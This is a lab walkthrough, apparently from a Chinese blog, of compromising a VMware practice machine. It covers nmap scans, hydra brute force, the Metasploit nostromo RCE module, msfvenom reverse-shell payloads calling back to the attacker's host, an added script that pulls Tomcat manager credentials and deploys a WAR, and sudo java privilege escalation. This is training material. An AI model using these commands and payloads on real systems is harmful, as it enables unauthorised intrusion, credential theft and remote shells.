一、Information gathering
1、Scan the /24 to find the target's IP
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.62.129/24
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-01 23:55 HKT
Nmap scan report for 192.168.62.1
Host is up (0.00026s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.62.2
Host is up (0.00019s latency).
MAC Address: 00:50:56:F4:60:0B (VMware)
Nmap scan report for 192.168.62.130
Host is up (0.00047s latency).
MAC Address: 00:0C:29:39:83:54 (VMware)
Nmap scan report for 192.168.62.254
Host is up (0.00038s latency).
MAC Address: 00:50:56:EB:19:29 (VMware)
Nmap scan report for 192.168.62.129
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.05 seconds
The other hosts on this LAN are already known (.1, .2 and .254 belong to the VMware host/NAT setup, .129 is the Kali box itself), so the newly added target is 192.168.62.130.
2、Scan the target's open ports
① TCP ports
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.62.130
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-01 23:57 HKT
Nmap scan report for 192.168.62.130
Host is up (0.0022s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
2222/tcp open  EtherNetIP-1
3306/tcp open  mysql
8009/tcp open  ajp13
8080/tcp open  http-proxy
8081/tcp open  blackice-icecap
MAC Address: 00:0C:29:39:83:54 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.70 seconds
② UDP ports (nothing usable: every port is either open|filtered with no response or closed)
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --min-rate 10000 -p- 192.168.62.130
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 00:00 HKT
Warning: 192.168.62.130 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.62.130
Host is up (0.00053s latency).
All 65535 scanned ports on 192.168.62.130 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:39:83:54 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 72.87 seconds
Service versions on the open ports. Note that the service column of the first scan is only a guess from the port number: 2222 is not EtherNet/IP but a second web server (nostromo 1.9.6), and 8081 is nginx. The version scan is what to trust:
┌──(kali㉿kali)-[/usr/share/wordlists]
└─$ sudo nmap -sV -sT -O -p22,80,2222,3306,8009,8080,8081 192.168.62.130
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 23:45 HKT
Nmap scan report for 192.168.62.130
Host is up (0.00068s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
2222/tcp open  http    nostromo 1.9.6
3306/tcp open  mysql   MySQL (unauthorized)
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
8081/tcp open  http    nginx 1.14.2
MAC Address: 00:0C:29:39:83:54 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.39 seconds
二、Getting a shell
1、Port 22
① Search for version exploits: nothing. (searchsploit requires every word of the query to match, so the full banner "OpenSSH 7.9p1 Debian 10+deb10u2" finds nothing by construction; narrow the query to something like `searchsploit openssh 7.9` before concluding there is nothing.)
┌──(kali㉿kali)-[/usr/share/wordlists]
└─$ searchsploit OpenSSH 7.9p1 Debian 10+deb10u2
Exploits: No Results
Shellcodes: No Results
② Quick brute force: not possible. The server does not accept password authentication at all (hydra's "method reply 4"), so password guessing against SSH is pointless here.
┌──(kali㉿kali)-[/usr/share/wordlists]
└─$ hydra -l webserver -P rockyou.txt 192.168.62.130 ssh -f
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-02 23:38:46
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.62.130:22/
[ERROR] target ssh://192.168.62.130:22/ does not support password authentication (method reply 4).
3、Port 2222 (nostromo)
① Search for known nostromo vulnerabilities
msf6 > search nostromo

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nostromo_code_exec
② There is one RCE module, for the 2019 directory-traversal bug in nostromo up to 1.9.6 (CVE-2019-16278), which is exactly the version the scan reported. Try it:
msf6 > use 0
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(multi/http/nostromo_code_exec) > options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)

View the full module info with the info, or info -d command.
msf6 exploit(multi/http/nostromo_code_exec) > set rhosts 192.168.62.130
rhosts => 192.168.62.130
msf6 exploit(multi/http/nostromo_code_exec) > set rport 2222
rport => 2222
msf6 exploit(multi/http/nostromo_code_exec) > set lhost 192.168.62.129
lhost => 192.168.62.129
msf6 exploit(multi/http/nostromo_code_exec) > options
Module options (exploit/multi/http/nostromo_code_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.62.130 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 2222 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.62.129 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (Unix In-Memory)
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/nostromo_code_exec) > run
[*] Started reverse TCP handler on 192.168.62.129:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (192.168.62.129:4444 -> 192.168.62.130:53560) at 2023-02-05 18:05:01 +0800
id
uid=1(daemon) gid=1(daemon) groups=1(daemon),0(root)
shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /usr/bin/bash
id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon),0(root)
daemon@webserver:/usr/bin$
Got a shell! Note the `id` output: the daemon user is also a member of group 0 (root), which widens what it can read and write on the box and matters for the next steps.
4、Port 3306: a side attempt
① Quick brute force: rejected before authentication. "Host ... is not allowed to connect" means no MySQL account is defined for root@192.168.62.129 at all; MySQL grants are per user@host, so the server turns the connection away before any password is tried. Brute forcing from this host cannot work, and the only route is through a host the grants do allow (typically localhost, once we are on the box).
┌──(kali㉿kali)-[/usr/share/wordlists]
└─$ hydra -l root -P rockyou.txt 192.168.62.130 mysql -f
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-02 23:41:25
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.62.130:3306/
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
5、8008
6、Port 8080
Open http://ip:port in a browser to see what is running. It is Tomcat, so the next thing to find is its manager application (by default at /manager/html):
三、Privilege escalation
1、Gather system information
daemon@webserver:/usr/bin$ ls -l /etc/crontab
-rw-r--r-- 1 root root 1042 Oct 11  2019 /etc/crontab
daemon@webserver:/usr/bin$ ls -l /etc/passwd
-rw-r--r-- 1 root root 1447 Mar 31  2020 /etc/passwd
daemon@webserver:/usr/bin$ sudo -l
sudo: unable to resolve host webserver: Name or service not known

We trust you have received the usual lecture from the local System Administrator.
It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Neither crontab nor passwd is writable, and sudo goes on to ask for a password we do not have, so there is no direct path up as daemon.
② Look for writable files: `find / -writable -type f 2>/dev/null | grep users.xml` (the original command used an unquoted `*users.xml`, which the shell expands as a glob against the current directory; quote it or drop the star).
③ This turns up Tomcat's user configuration file (tomcat-users.xml). Reading it gives the manager username and password: the file is readable/writable to us because daemon sits in the root group, which is exactly why the gid 0 membership above matters.
④ Log in to the Tomcat manager; it has a WAR upload (deploy) function.
⑤ Build the payload with msfvenom (msfvenom's documented container format for JSP payloads is `-f war`; the author used `-f jar` and simply named the output .war):
sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.62.129 LPORT=8888 -f jar > doit.war
⑥ Upload the WAR through the manager page. Once it shows as deployed, click the application's name in the manager's application list to run it.
⑦ Set up a msf handler with the same PAYLOAD, LHOST and LPORT that msfvenom was given, then run it:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.62.129
lhost => 192.168.62.129
msf6 exploit(multi/handler) > set lport 8888
lport => 8888
msf6 exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.62.129:8888
[*] Command shell session 1 opened (192.168.62.129:8888 -> 192.168.62.130:58322) at 2023-02-05 22:36:47 +0800
python -c 'import pty;pty.spawn("/bin/bash")'   # upgrade the dumb shell to an interactive pty
tomcat@webserver:~$
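Steps ② to ⑦ can be done without the browser, which also avoids a classic mistake: Tomcat's shipped tomcat-users.xml contains example accounts inside XML comments, and a bare grep reports them as if they were real. The functions below are an added example, not from the original post; they assume `sed -E`, `grep -o` and curl, the attribute order `username`, `password`, `roles` that Tomcat's own file uses, and the write-up's host. The sample file and its credentials are constructed for the demonstration. Deploying through `/manager/text/deploy` needs the manager-script role, whereas the HTML form the write-up used needs manager-gui, so check the roles column before choosing the route.

```sh
#!/bin/sh
# Added example (not from the original post): extract manager credentials from a
# tomcat-users.xml and deploy a WAR through the manager text API. Assumes sed -E,
# grep -o, curl. Find the real file with: find / -name tomcat-users.xml 2>/dev/null

# Constructed sample, including a commented-out entry that must NOT be reported.
write_sample_users() {
    cat > "$1" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users>
  <!-- <user username="tomcat" password="changeme" roles="manager-gui"/> -->
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="admin" password="Passw0rd" roles="manager-gui,manager-script"/>
</tomcat-users>
EOF
}

# Print username:password:roles for every live <user .../> element.
# The file is flattened to one line, XML comments are stripped (a valid comment never
# contains "--"), then each <user .../> element is pulled out and its attributes split.
# Assumes the attribute order username, password, roles.
tomcat_creds() {
    tr '\n' ' ' < "$1" \
      | sed -E 's/<!--([^-]|-[^-])*-->//g' \
      | grep -o '<user [^>]*/>' \
      | sed -E 's/.*username="([^"]*)".*password="([^"]*)".*roles="([^"]*)".*/\1:\2:\3/'
}

# Deploy a WAR with PUT /manager/text/deploy (manager-script role), then request the
# context once so the JSP inside runs and connects back to the waiting handler.
#   $1 user:pass   $2 path to WAR   $3 host   $4 context name (without slash)
deploy_war() {
    creds="$1" war="$2" host="$3" ctx="$4"
    curl -s -u "$creds" -T "$war" "http://$host:8080/manager/text/deploy?path=/$ctx&update=true"
    curl -s -o /dev/null "http://$host:8080/$ctx/"
}

# Usage:
#   write_sample_users /tmp/tomcat-users.xml; tomcat_creds /tmp/tomcat-users.xml
#   deploy_war admin:Passw0rd doit.war 192.168.62.130 doit   # with the msf handler already running
```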
⑧ Check the tomcat user's sudo rights: it may run java as root without a password.
tomcat@webserver:/tmp$ sudo -l
sudo: unable to resolve host webserver: Name or service not known
Matching Defaults entries for tomcat on webserver:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tomcat may run the following commands on webserver:
    (ALL) NOPASSWD: /usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java
⑨ Build a .jar payload with msfvenom
sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.62.129 LPORT=9999 -f jar >xiaoliyu.jar
⑩ Transfer the JAR to the target (the session's upload function would not work for me, so I copied the file with scp). Serving the file from Kali with `python3 -m http.server` and fetching it with wget or curl from the target is another option when scp is not available.
⑪ Set up a msf handler on port 9999
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.62.129
lhost => 192.168.62.129
msf6 exploit(multi/handler) > set lport 9999
lport => 9999
msf6 exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf6 exploit(multi/handler) > run
⑫ Run the JAR as root. (This errored for me; online sources said the file got corrupted in transfer, but transferring with sftp gave the same result, so I had to look for another route to root. Normally step ⑬ follows and you are root.)
sudo -u root java -jar xiaoliyu.jar
Two things to check when this fails. First, java/jsp_shell_reverse_tcp is JSP code that needs a servlet container such as Tomcat to run; it is not a Java main class, so `java -jar` has nothing to launch no matter how cleanly the file was copied. For a standalone JAR use a Java payload, e.g. `msfvenom -p java/shell_reverse_tcp LHOST=192.168.62.129 LPORT=9999 -f jar -o xiaoliyu.jar`, and confirm with `unzip -p xiaoliyu.jar META-INF/MANIFEST.MF` that a Main-Class line is present before transferring it. Second, the sudo rule names the exact path `/usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java`; invoke that full path rather than a bare `java` so that the command sudo resolves matches the rule.
⑬ Once the handler catches the connection, spawn a pty with python as before; you will see you are root.
To be continued
From: https://www.cnblogs.com/xiaoliyulixianji/p/17084564.html